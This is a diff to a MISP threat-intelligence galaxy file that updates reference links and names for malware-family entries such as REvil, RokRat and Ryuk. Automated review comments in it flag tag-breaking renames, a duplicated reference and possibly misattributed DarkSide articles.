"https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-1-000-plus-companies-in-msp-supply-chain-attack/", "https://www.nytimes.com/2019/08/22/us/ransomware-attacks-hacking.html", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti", + "https://www.kaseya.com/potential-attack-on-kaseya-vsa/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/kaseya-ransomware-supply-chain", "https://areteir.com/wp-content/uploads/2020/07/Arete_Insight_Sodino-Ransomware_June-2020.pdf", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-publishes-stolen-data-for-the-first-time/", + "https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/", + 
"https://www.goggleheadedhacker.com/blog/post/reversing-crypto-functions", "https://blag.nullteilerfrei.de/2020/02/02/defeating-sodinokibi-revil-string-obfuscation-in-ghidra/", "https://www.bleepingcomputer.com/news/security/a-look-inside-the-highly-profitable-sodinokibi-ransomware-business/", - "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-publishes-stolen-data-for-the-first-time/", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://vimeo.com/449849549", "https://blag.nullteilerfrei.de/2019/11/09/api-hashing-why-and-how/", + "https://gist.githubusercontent.com/fwosar/a63e1249bfccb8395b961d3d780c0354/raw/312b2bbc566cbee2dac7b143dc143c1913ddb729/revil.json", + "https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/", + "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/", "https://ke-la.com/darknet-threat-actors-are-not-playing-games-with-the-gaming-industry/", + "https://twitter.com/R3MRUM/status/1412064882623713283", + "https://blogs.blackberry.com/en/2021/05/threat-thursday-dr-revil-ransomware-strikes-again-employs-double-extortion-tactics", "https://www.domaintools.com/resources/blog/revealing-revil-ransomware-with-domaintools-and-maltego", + "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b", + "https://www.crowdstrike.com/blog/how-crowdstrike-stops-revil-ransomware-from-kaseya-attack/", "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-may-tip-nasdaq-on-attacks-to-hurt-stock-prices/", "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-new-york-airport-systems/", "https://www.trendmicro.com/en_us/research/21/a/sodinokibi-ransomware.html", - 
"https://community.riskiq.com/article/3315064b", + "https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/", + "https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/", + "https://unit42.paloaltonetworks.com/threat-brief-kaseya-vsa-ransomware-attacks/", + "https://twitter.com/SophosLabs/status/1413616952313004040?s=20", "https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-managedcom-hosting-provider-500k-ransom/", "https://blog.amossys.fr/sodinokibi-malware-analysis.html", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/", + "https://twitter.com/LloydLabs/status/1411098844209819648", "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", + "https://www.elastic.co/blog/elastic-security-prevents-100-percent-of-revil-ransomware-samples?utm_content=&utm_medium=social&utm_source=twitter", + "https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html", + "https://securelist.com/ransomware-world-in-2021/102169/", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.youtube.com/watch?v=tZVFMVm5GAk", + "https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs", + "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/", + 
"https://www.bleepingcomputer.com/news/security/revil-ransomwares-servers-mysteriously-come-back-online/", + "https://www.splunk.com/en_us/blog/security/kaseya-sera-what-revil-shall-encrypt-shall-encrypt.html", "https://www.bleepingcomputer.com/news/security/revil-ransomware-gang-claims-over-100-million-profit-in-a-year/", + "https://unit42.paloaltonetworks.com/prometheus-ransomware/", "https://threatintel.blog/OPBlueRaven-Part1/", - "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://velzart.nl/blog/ransomeware/", "https://isc.sans.edu/diary/27012", + "https://ke-la.com/ransomware-gangs-are-starting-to-look-like-oceans-11/", "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/", "https://securelist.com/sodin-ransomware/91473/", + "https://www.flashpoint-intel.com/blog/chatter-indicates-blackmatter-as-revil-successor/", + "https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/", + "https://unit42.paloaltonetworks.com/revil-threat-actors/", + "https://www.splunk.com/en_us/blog/security/revil-ransomware-threat-research-update-and-detections.html", + "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/", + "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://medium.com/s2wlab/deep-analysis-of-revil-ransomware-written-in-korean-d1899c0e9317", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", 
+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/", + "https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling", + "https://www.crowdstrike.com/blog/how-falcon-complete-thwarted-a-revil-ransomware-attack/", + "https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/", + "https://www.goggleheadedhacker.com/blog/post/sodinokibi-ransomware-analysis", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "https://www.youtube.com/watch?v=QYQQUUpU04s", + "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/", + "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", "https://www.kpn.com/security-blogs/Tracking-REvil.htm", + "https://www.zscaler.com/blogs/security-research/kaseya-supply-chain-ransomware-attack-technical-analysis-revil-payload", "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://twitter.com/SyscallE/status/1411074271875670022", + "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel", "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-gangs-web-sites-mysteriously-shut-down/", + 
"https://twitter.com/resecurity_com/status/1412662343796813827", + "https://twitter.com/Jacob_Pimental/status/1398356030489251842?s=20", + "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/", + "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html", "https://tehtris.com/fr/peut-on-neutraliser-un-ransomware-lance-en-tant-que-system-sur-des-milliers-de-machines-en-meme-temps/", - "https://vimeo.com/449849549", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-travelex-demands-3-million/", + "https://news.sophos.com/en-us/2021/06/30/mtr-in-real-time-hand-to-hand-combat-with-revil-ransomware-chasing-a-2-5-million-pay-day/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://securityintelligence.com/posts/sodinokibi-revil-ransomware-disrupt-trade-secrets/", + "https://www.cnbc.com/2021/04/23/axis-of-revil-inside-the-hacker-collective-taunting-apple.html", "https://www.youtube.com/watch?v=l2P5CMH9TE0", + "https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/", + "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/", + "https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20", "https://www.grahamcluley.com/travelex-paid-ransom/", "https://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain", "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/", "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + 
"https://www.bleepingcomputer.com/news/security/kaseyas-universal-revil-decryption-key-leaked-on-a-hacking-forum/", + "https://www.bleepingcomputer.com/news/security/fbi-revil-cybergang-behind-the-jbs-ransomware-attack/", "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights", + "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/", + "https://www.cybereason.com/blog/cybereason-vs-revil-ransomware-the-kaseya-chronicles", "https://www.secureworks.com/research/threat-profiles/gold-southfield", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", "https://asec.ahnlab.com/ko/19640/", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/", - "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel", - "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-travelex-demands-3-million/", + "https://teamt5.org/tw/posts/revil-dll-sideloading-technique-used-by-other-hackers/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", + "https://intel471.com/blog/changes-in-revil-ransomware-version-2-2", "https://dissectingmalwa.re/germanwipers-big-brother-gandgrabs-kid-sodinokibi.html", + "https://www.bleepingcomputer.com/news/security/revil-gang-tries-to-extort-apple-threatens-to-sell-stolen-blueprints/", 
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos"
 ],
 "synonyms": [
@@ -26546,17 +30393,22 @@
 "type": []
 },
 "uuid": "e7698597-e0a9-4f4b-9920-09f5db225bd4",
- "value": "REvil"
+ "value": "REvil (Windows)"
 },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor",
- "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
 "https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view",
- "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/",
+ "https://www.welivesecurity.com/2021/08/06/anatomy-native-iis-malware/",
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
 "https://www.secureworks.com/research/threat-profiles/cobalt-lyceum",
+ "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware.pdf",
+ "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
+ "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran",
+ "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf",
 "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/"
 ],
 "synonyms": [],
@@ -26566,7 +30418,7 @@
 "value": "RGDoor"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhino",
@@ -26576,7 +30428,7 @@
 "type": []
 },
 "uuid": "cff6ec82-9d14-4307-9b5b-c0bd17e62f2a",
- "value": "Rhino Ransomware"
+ "value": "Rhino"
 },
 {
 "description": "",
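Review bot: Changing `value` from `"REvil"` to `"REvil (Windows)"` in the `@@ -26546,17 +30393,22 @@` hunk alters the string MISP builds the galaxy tag from (`misp-galaxy:malpedia="REvil"`), so events, sightings and correlation rules that already carry the old tag no longer resolve to this cluster even though the `uuid` is unchanged; the `"Rhino Ransomware"` → `"Rhino"` rename in the `@@ -26576,7 +30428,7 @@` hunk has the same effect. Unless the old names are already present, adding the previous value to each entry's `synonyms` (e.g. `"REvil"` for the first, `"Rhino Ransomware"` for the second) keeps lookups and tag searches on the old name working. Both `synonyms` arrays lie outside these hunks, so this cannot be confirmed from the diff alone.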
@@ -26681,11 +30533,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.rms",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-Attacks-on-industrial-enterprises-using-RMS-and-TeamViewer-EN.pdf",
 "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf",
 "https://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/",
- "https://ics-cert.kaspersky.com/media/Kaspersky-Attacks-on-industrial-enterprises-using-RMS-and-TeamViewer-EN.pdf",
+ "https://blog.yoroi.company/research/ta505-is-expanding-its-operations/",
 "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
- "https://blog.yoroi.company/research/ta505-is-expanding-its-operations/"
+ "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/"
 ],
 "synonyms": [
 "Gussdoor",
@@ -26710,6 +30563,8 @@
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://arstechnica.com/information-technology/2019/05/baltimore-city-government-hit-by-robbinhood-ransomware/",
 "https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/",
+ "https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf",
+ "https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/",
 "https://goggleheadedhacker.com/blog/post/12",
 "https://twitter.com/VK_Intel/status/1121440931759128576",
 "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
@@ -26743,6 +30598,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
 "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware",
 "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/"
 ],
@@ -26772,7 +30628,8 @@
 "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
 "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/",
 "https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/",
- "https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/"
+ "https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/",
+ "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/"
 ],
 "synonyms": [],
 "type": []
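Review bot: The added `"https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/"` in the `@@ -26772,7 +30628,8 @@` hunk appears to be the same post as the existing `"https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/"` (identical date and slug, different host), so the entry now lists one reference twice; the RokRat hunk at `@@ -26798,26 +30655,29 @@` ends up with both hosts as well. If the wordpress.com address is the one that still resolves, replacing the old line rather than appending keeps `refs` free of duplicates, and this file already uses `web.archive.org` captures where a source has moved. The whole-array reorderings in these hunks suggest the list is regenerated from upstream, in which case the duplicate is better removed at the source than patched here.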
@@ -26798,26 +30655,29 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat",
- "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf",
- "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/",
- "https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/",
- "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html",
- "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
- "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
- "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
+ "https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/",
 "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/",
- "https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/",
- "https://www.ibm.com/downloads/cas/Z81AVOY7",
- "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html",
- "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
- "https://www.youtube.com/watch?v=uoBQE5s2ba4",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
 "https://github.com/ssp4rk/slides/blob/master/2019SAS_Behind_of_the_Mask_of_ScarCruft.pdf",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/",
 "http://v3lo.tistory.com/24",
 "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/",
- "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
+ 
"http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf",
+ "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html",
+ "https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48",
+ "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
+ "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
+ "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
+ "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf",
+ "https://www.youtube.com/watch?v=uoBQE5s2ba4",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/",
+ "https://www.ibm.com/downloads/cas/Z81AVOY7",
+ "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/",
+ "https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/",
+ "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html",
+ "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf"
 ],
 "synonyms": [
 "DOGCALL"
@@ -26943,6 +30803,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli",
 "https://github.com/nccgroup/Royal_APT",
 "https://www.secureworks.com/research/threat-profiles/bronze-palace",
+ "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
 "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
 ],
 "synonyms": [],
@@ -26958,6 +30819,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns",
 "https://github.com/nccgroup/Royal_APT",
 "https://www.secureworks.com/research/threat-profiles/bronze-palace",
+ "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
 "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
 ],
 "synonyms": [],
@@ -26984,11 +30846,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm",
- "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
 "https://www.youtube.com/watch?v=YXnNO3TipvM",
- "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/",
+ "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
 "http://www.peppermalware.com/2019/11/brief-analysis-of-redaman-banking.html",
- "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/"
+ "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/"
 ],
 "synonyms": [
 "Redaman"
@@ -27070,6 +30934,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock",
 "http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf",
 "http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
 "http://contagiodump.blogspot.com/2011/10/rustock-samples-and-analysis-links.html",
 "https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html",
 "https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/",
@@ -27088,21 +30953,27 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", "https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/", "https://threatconnect.com/blog/threatconnect-research-roundup-possible-ryuk-infrastructure/", "https://community.riskiq.com/article/0bcefe76", "https://www.hhs.gov/sites/default/files/bazarloader.pdf", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", "https://www.carbonblack.com/blog/vmware-carbon-black-tau-ryuk-ransomware-technical-analysis/", "https://www.splunk.com/en_us/blog/security/ryuk-and-splunk-detections.html", "https://twitter.com/ffforward/status/1324281530026524672", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-NicolaoMartins.pdf", + "https://www.advanced-intel.com/post/adversary-dossier-ryuk-ransomware-anatomy-of-an-attack-in-2021", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html", "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - 
"https://twitter.com/anthomsec/status/1321865315513520128", + "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/", "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike", "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-stops-encrypting-linux-folders/", 
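Review bot: Two of the references added to the Ryuk entry in this hunk — `https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/` and `https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/` — are titled as DarkSide coverage, and nothing visible in the hunk shows they discuss Ryuk. If they were attached because the articles compare DarkSide's revenue with Ryuk's, that is fine, but it is worth confirming before they land, since refs on a Malpedia-mirrored cluster are often read downstream as supporting evidence for the family they sit under. The refs array for this entry starts before the hunk and continues past it.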
@@ -27124,15 +30995,18 @@
 "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/",
 "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
 "https://0xc0decafe.com/2020/12/28/never-upload-ransomware-samples-to-the-internet/",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
 "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/",
 "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
 "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
 "https://twitter.com/IntelAdvanced/status/1353546534676258816",
 "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf",
 "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/",
 "https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/",
 "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://twitter.com/SecurityJoes/status/1402603695578157057",
 "https://github.com/scythe-io/community-threats/tree/master/Ryuk",
 "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
 "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/",
@@ -27140,18 +31014,24 @@
 "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
 "https://www.zdnet.com/article/dod-contractor-suffers-ransomware-infection/",
 "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
+ "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/5768-ccn-cert-id-03-21-ryuk-ransomware/file.html",
 "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/",
+ "https://news.sophos.com/en-us/2021/05/06/mtr-in-real-time-pirates-pave-way-for-ryuk-ransomware/",
 "https://www.bleepingcomputer.com/news/security/steelcase-furniture-giant-hit-by-ryuk-ransomware-attack/",
